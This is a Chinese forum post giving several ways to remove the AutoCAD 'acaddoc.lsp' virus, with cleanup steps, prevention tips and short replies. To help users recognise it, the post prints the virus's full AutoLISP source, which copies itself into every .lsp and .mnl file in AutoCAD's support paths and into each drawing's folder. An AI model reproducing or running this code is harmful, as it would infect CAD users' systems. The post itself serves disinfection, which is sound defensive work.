油气储运网

 找回密码
 立即注册

QQ登录

QQ快速登录

一步迅速开始

pdms培训&项目数字化360网
查看: 13153|回复: 3

[软件分享] autocad LSP病毒清理方法汇总(acaddoc.lsp病毒清理)

[复制链接]
发表于 2016-4-15 13:07:09 | 显示全部楼层 |阅读模式
“acaddoc.lsp”该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。将病毒代码(“acaddoc.lsp”文件内容)写入“*.lsp”文件内,并在“*.mnl”文件中写入“*.lsp”文件的加载路径。同时,直线命令“line”、外部参照管理命令“xref”和分解(炸开)命令“explode”无法使用。

CAD系统感染该病毒文件后,只是简单搜索删除“acaddoc.lsp”文件,不能清除病毒。因为所有的“*.lsp”文件已经被修改,所有“*.lsp”文件都是病毒文件。


解决方法1:

①、关闭CAD

②、搜索并刪除所有“acaddoc.lsp”文件

③、卸载CAD(必须卸载干净,并进入C盘用户目录内删除没有卸载完的CAD文件)后,重新安装CAD

解决方法2:
①、关闭CAD

②、搜索并刪除所有“acaddoc.lsp”文件

③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑,复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件(包括C盘用户目录内的相关文件)

预防CAD病毒:

装好CAD系统后,在没有被病毒感染前,将CAD目录内所有文件的属性设置为只读,可以减少中毒的机率。(此法99.999%有效)

附:C:\Documents and Settings\×××\Application Data\Autodesk\autocad 200×\R×.×\

其中×××是你登录系统时的用户名, 200×和R×.×分别是CAD的版本和版本代号。(注意:目录C:\Documents and Settings\是系统隐藏文件夹)


方法3
CAD开机运行时会有一大串函数,并且产生acaddoc.lsp的文件处理方法
在网上找了很多所谓的CAD病毒专杀、acaddoc.lsp专杀什么的软件。。。全试了都没有用。后来通过网上介绍的一些关于lsp病毒的特性,亲身试验后确实有效,在此和大家分享,希望能为大家解决一些问题。
下面言归正传,杀毒步骤如下:
1、全盘删除acaddoc.lsp(包括隐藏文件夹)
2、删除C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acaddoc.lsp和acadapq.lsp
3、删除C:\Documents and Settings\Administrator\Application。Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acad.mnl、acetmain.mnl和AecArchXOE.mnl。
4、删除C:\Program Files\AutoCAD 2006\Support下面所有的*****.lsp,本人用的2006版共10个****.lsp文件。
5、COPY下面附件的alsp内的两个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。
6、COPY下面附件的mnl内的三个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。
7、COPY下面附件的LSP内的十个文件到C:\Program Files\AutoCAD 2006\Support,改为只读。

经以上步骤处理后,就完全可以放心使用了。


方法4
CAD的病毒很多但都大同小异。现就出现的ACADDOC.LSP病毒进行杀毒。不用重新安装CAD的办法。
1、发现文件夹中多出ACADDOC.LSP说明你中毒了。
2、关闭CAD程序。
3、全盘查找 *.fas *.lsp *.mnl *.arx文件,除了CAD安装目录以外的全部删除。
4、检查CAD安装目录文件的修改时间,把最近的几个文件中的病毒代码删除。(用记事本打开)
5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。

说明:
1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support文件夹下的3d.lsp;3darray.lsp;acad2010.lsp;acad2010doc.lsp;acadinfo.lsp;ai_utils.lsp;attredef.lsp;edge.lsp;mvsetup.lsp;sample-profile-util.lsp文件。
2、要删除的病毒代码在文件的尾部,具体如下:
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)

发表于 2016-4-16 00:30:21 | 显示全部楼层
谢谢楼主分享
发表于 2016-4-17 08:11:23 | 显示全部楼层
谢谢楼主的讲解和分享。
发表于 2022-5-22 11:51:35 | 显示全部楼层
谢谢楼主的分享
您需要登录后才可以回帖 登录 | 立即注册  

本版积分规则

扫码访问手机版

QQ|关于我们|网站地图|油气储运网 ( 鲁ICP备11007657号-3 )

GMT+8, 2024-11-14 15:10 , Processed in 0.033764 second(s), 15 queries , Gzip On, MemCached On.

Powered by Discuz! X3.5

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回列表